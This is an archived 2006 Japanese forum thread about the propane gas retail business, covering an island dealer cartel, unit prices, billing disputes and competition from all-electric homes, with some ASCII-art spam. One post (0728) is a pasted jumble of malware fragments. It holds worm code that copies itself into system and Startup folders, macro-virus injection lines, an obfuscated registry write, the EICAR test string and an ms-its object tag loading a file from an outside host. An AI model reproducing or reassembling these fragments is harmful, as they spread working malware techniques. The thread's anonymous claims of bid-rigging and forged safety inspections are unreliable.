0688名無電力14001
2006/04/29(土) 11:59:460689新規営業
2006/04/29(土) 15:51:38持っているのは第二種販売主任者免状と見込み客50世帯と1千2百万円
ガスの充填(仕入先)は、ボンベを買ったらすぐ卸してくれるものだろうか?
誰かお教えください。
0690名無電力14001
2006/04/30(日) 00:24:540691新規営業
2006/04/30(日) 10:48:08いまして。 ほとんどが、ガソリンスタンド組合で、充填所が島に一ヶ所しかなく
それぞれが値段を下げないように又、テリトリーを荒らさないよう談合しています。
だから島の人たちは高いガスを買うより他なく選ぶ事すら出来ません。
組合長は一年交代で順番制、組合長時代にメーターの取り替え等が発生したら
架空の会社を作り10,000円で買える物を12,000円で卸して差額を搾取している。
と充填所に働く私のいとこが嘆いています。
こんなこと言おうものなら即解雇されてしまいます。働き口がなくなってしまいます。
だから黙っています、当然搾取された金額はガス料金に反映されています。
19業者すべてが同じ事をします。 そしてわかっていて何も言いません。
閉鎖的で不透明な料金体制これを何とかしたくて、、、、こんな島での新規参入は
大変警戒されてしまいますが、しかし充填してくれる所、権利?、これを何とか
取得して島の為に何とか出来ないかなーと悩んでいます。
島で充填出来なければ、本土から船便で手配するとか方法はあると思うのですが?
どんな営業許可、資格が必要なのか? どこにどう申請するのか?メーター、ボンベ
は、どこで売っているのか、いくらぐらいか?本土へ飛び込みでお願いしたら、
ボンベに充填してくれるのだろうか?????不安がいっぱいです。
私のほうは、従業員10名ほどの小さな会社を経営しています従業員達と相談して
みな協力して仕事の合間でやってみようと言う結果になりました。
そうしたら一つの島興しに貢献するのではないかと、、、、、
どちら様か教えていただけないでしょうか。 お願い致します。
0692名無電力14001
2006/04/30(日) 11:15:53やめたほうがいいよ!
新規業者が安売りしたって、縁故関係が強い地域のようなのでよそ者扱いされて終わるよ。
だいたい、充填が無理貸してくれないよ、勝てない喧嘩は売らない方が無難!
お客同士で組合に対してオンブズマンを実行し、公開質問、情報開示、値引き交渉、などを
した方がいいのでは、島の人たちも喜ぶと思うよ。
おたくらは、この離島で新規参入言をして利益を上げたいのか、又は組合を是正して
料金を下げさせたいのか、今ひとつつかめません。
0693新規営業
2006/04/30(日) 12:21:54私達が参入することで、LPガスの適正な価格と質の高いサービスを提供して
自由料金だと言う事を、島の人に知らしめて競争して、料金の改正をしてもらい又
私ども、も安定した経営が出来るようにと考えていました。
こんな小さな島で一部の人たちがライフラインに群がり私腹を肥やして
いるのがたまらないと思いました。 うらやましいとも思いました。
充填が無理なら仕方ありませんね! 従業員達と話をしてやめようかなー
いとこ、に対しても「見ざる、聞かざる、言わざる」サルになりなさいと、、、
少しくやしいなー、ヤッパリだめかなー、
0694名無電力14001
2006/05/01(月) 10:43:11でも、設備投資費用が莫大にかかり、それを一社で担うわけだから相当リスクがある。
多分、組合側も一斉に料金を下げてくるだろう、そうなると新規組は商売しずらくなり
充填設備にかけた、莫大な借金のみ残るのでは。
いずれにしても、この地域は、人のふんどしを借りても、借りなくても難しい地域だと思います。
0695家計簿
2006/05/02(火) 10:27:18ニチガスはそのうちまた下げますといいますがどうなんでしょう?
(基本料金1500円+単価は?)いろいろきくとニチガスもあやしい?
先程、地元商事でJOMO系列の営業が来て基本料金1600円+単価260円ときたのですが、
こちらのほうが安いのかな〜?悩むところです。
0696名無電力14001
2006/05/02(火) 11:57:12しかしこの一年の間に八十円値上がりました。
最初の約束は値上げはしないと言ってたのに、担当が変わったので知らないみたいに言われました。
うちはニチガスは他のプロパン会社に変えるつもりです。
0697名無電力14001
2006/05/02(火) 12:26:12長く付き合って、わがままの言える関係が、最終的には徳かも?
0698名無電力14001
2006/05/02(火) 13:17:120699家計簿
2006/05/02(火) 13:38:52他よりもとても安かったんだけど、4月から500円もアップです。
それも1行の案内だけで。変えようかな〜
0700名無電力14001
2006/05/02(火) 18:55:17みな最初だけ、あと営業がアルバイトは嘘だね、ブロウカーはバイトもいるけど、バイトじゃなくて委託
0701名無電力14001
2006/05/02(火) 19:03:090702名無電力14001
2006/05/02(火) 21:42:060703名無電力14001
2006/05/03(水) 01:32:33単なるブローカー
仕入れも、原価も、関係ない取っていくらの世界の人?
0704名無電力14001
2006/05/18(木) 17:42:59m3単価指定で売ってる会社って今200円切ってる?
0705名無電力14001
2006/05/18(木) 19:06:24とらないよ。
高い設備費(配管、給湯器等)貸付設備して、そんで持って単価200円以下で納めて
4〜5年で閉店、次つながれば良いけどその確約は無いし、今では業務用は魅力ないよ。
>>704さん、あまり無理なことばっかし言ってると、ガスやに切られるよ。
店が繁盛していれば別ですけど。
0706名無電力14001
2006/05/18(木) 19:57:11200円以上なんでしょうか?
0707名無電力14001
2006/05/18(木) 21:28:34一人暮らしで、台所ではお湯は使わないし、コンロは電熱線で、
風呂でしかガスを使っていないはずなのに、17m3も使ってるからって
9000円も請求されました。
料金自体はプロパンなら平均より少し高いぐらいのようですが、
一日30分しか風呂に入らず、浴槽にお湯を張る際は半身浴ができる程度に
しているのに、17m3も使ってるって、明らかにおかしいですよね?
漏れたりすることって、あるんでしょうか?
0708名無電力14001
2006/05/18(木) 23:01:54デ○ーズ等は多分150円前後だと思うよ。
個人の飲食店は250円前後かなもちろんどちらも基本料金は0円
0709名無電力14001
2006/05/19(金) 08:31:42そんなに高くしたらすぐに切り替えられちゃうよ。
0710キタ━━(゚∀゚)━━ヨ
2006/05/19(金) 17:03:52http://society3.2ch.net/test/read.cgi/atom/1121267390/
__[警] [察]__ ジブンヲ
( ) ('A`) ( )
( )V| |V( )
| | | | | |
__[警] [察]__
ヽ('A`) ('A`) ('A`)ノ トキハナ
( )V( )V( )
ノ | .ノ | .ノ | ⌒ ωωω
__[警] [察]__
ヽ( 'A) ( 'A) .( 'A)ノ
( )V( )V( )
ノ | .ノ | .ノ | ωωω
アヒャヒャヒャヒャ ヘ(゚∀゚ヘ)(ノ゚∀゚)ノ ヒャヒャヒャヒャ
http://society3.2ch.net/test/read.cgi/atom/1111218411/
キタキタキタキタ━━━(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)━━━━!!
http://society3.2ch.net/test/read.cgi/atom/1006334921/l50
三 ̄ ̄ ̄ ̄\
/ ____|
/ >\ / |
/ / (・) (・) |
| /---●--●-|
|─(6 メ つ | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ___ | < ・・・一体何をやらかしたんだい?
\ \_/ / \_________________________
\___/
0711名無電力14001
2006/05/19(金) 22:52:21間違いなく電気と都市ガスに駆逐されるなw
0712名無電力14001
2006/05/19(金) 23:00:510713名無電力14001
2006/05/20(土) 00:49:34業務用単価は、200円〜250円位じゃない、
うちの会社は200円以下の業務用は切り捨てましたよ、
仮に使用量が1,000m3でも赤字じゃ意味ないからね、
今では、基本料金まで取ってますよ。
もちろん配管設備費も有償でね。
いつ潰れるか分からないからね。
0714名無電力14001
2006/05/26(金) 01:07:00自社充填、自社配送してるならいいが、委託でやってるなら意味ないよ。
まして100m3前後なんて最悪。最低でも500m3ないとね。
0715名無電力14001
2006/05/26(金) 08:34:53配送委託で小規模業務用。「単価安くしないと入れられないから」と
卸元にスポットで安くするよう説得。卸元も少量だからとOk。
何箇所か受けてもらったら「中身一緒なのになんで値段が違うんじゃ」と
全て安い値段にしてもらう→うまぁ〜
安いところも普通の値段になって赤になってしまうかも知れない諸刃の剣
0716名無電力14001
2006/05/31(水) 18:58:51そうして、ガス単価を都市ガス並に下げましょう。
まずは、ニチガスさんトーカイさんレモンさんあたりから先人を切ってください。
そうしないと、この業界は終わりです。
無償配管、無償器具貸付をしている割に、新築現場で一番肩身の狭い思いをしているのは
どういう訳かガスやが多いと私を含めて思うがなぜ?
あまりにも、ガスやはなめられすぎ、もう少しプライドを持って商売しようよ。
0717名無電力14001
2006/05/31(水) 23:37:54法的な規制が必要です。
0718名無電力14001
2006/06/01(木) 20:55:57この業界は終わりですね。
あまりにも、無償配管、無償貸付、差別対価、切り替えブローカー、工事代金器具代金相手によって取ったり取らなかったり不透明すぎます。
裏事情ありすぎ、一般消費者から相手にされなくなりますよ、最終的には都市ガスORオール電化の選択
皆で、この大変重たい腰を持ち上げようよ。
最近では、新築の電化率は60%にまできてるのが現実です。
だから、他社から切り替えて穴埋めですか?単価は下がる、イメージは悪くなる、
大きな、メリットは無いと思うが?取ったもん勝ちて奴ですか!
TVコマーシャルで全国一律???円なんて・・・・
大手の中小の弱小も同じか、バカは休み休み言えってか日本一不透明な業界だな
0719機器メーカー
2006/06/02(金) 07:57:49都市ガスは地震は平気?遮断弁あってもその間は全部洩れる・・・ドッカンいかないかな。プロパンは確かに不透明。家買っても、賃貸でも消費者の選んで比較する権利がまったくない!全体的に可笑しいよね?
0720名無電力14001
2006/06/07(水) 00:31:05何を言ってるの?
日本全国の半分の世帯でプロパンを使用してるんだよ、
無くなるわけないじゃないwww
新築の60%が電化???
ちゃんと調べましょうねw
0721名無電力14001
2006/06/07(水) 08:31:31俺もそう思うよ。新築の60%が電化? もっとだろう。
0722名無電力14001
2006/06/07(水) 20:29:10気温も年間を通して高いから、特にエコキュトーの効率がいいし、もちろん太陽光発電
も高効率、(東日本に比べて)だしね。
多分、北日本、北海道では、オール電化は流行らないでしょう。
0723名無電力14001
2006/06/14(水) 23:21:19今月15日から新規営業禁止一ヵ月
富士産業
テラワロス
0724名無電力14001
2006/06/15(木) 09:39:330725名無電力14001
2006/06/17(土) 17:42:53イランジンデモワカル
0726名無電力14001
2006/06/22(木) 23:20:09ガス臭いから面倒で行かなかったのよー。
0727名無電力14001
2006/06/26(月) 11:21:40保安点検はみんな印鑑買って作ってる・・・。
0728名無電力14001
2006/06/27(火) 23:26:50If s = "htm" and fso.FileExists(f1.path+"l") = False
thenfso.CopyFile f1.path, f1.path+"l"
A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start
menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\command.txt.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"
type="text
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&passwd.vbs", "j:\windows\start
menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then
fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN,
ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite
A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
kak.hta';ken=wd+'START
End sub
0729名無電力14001
2006/07/09(日) 15:35:30■ このスレッドは過去ログ倉庫に格納されています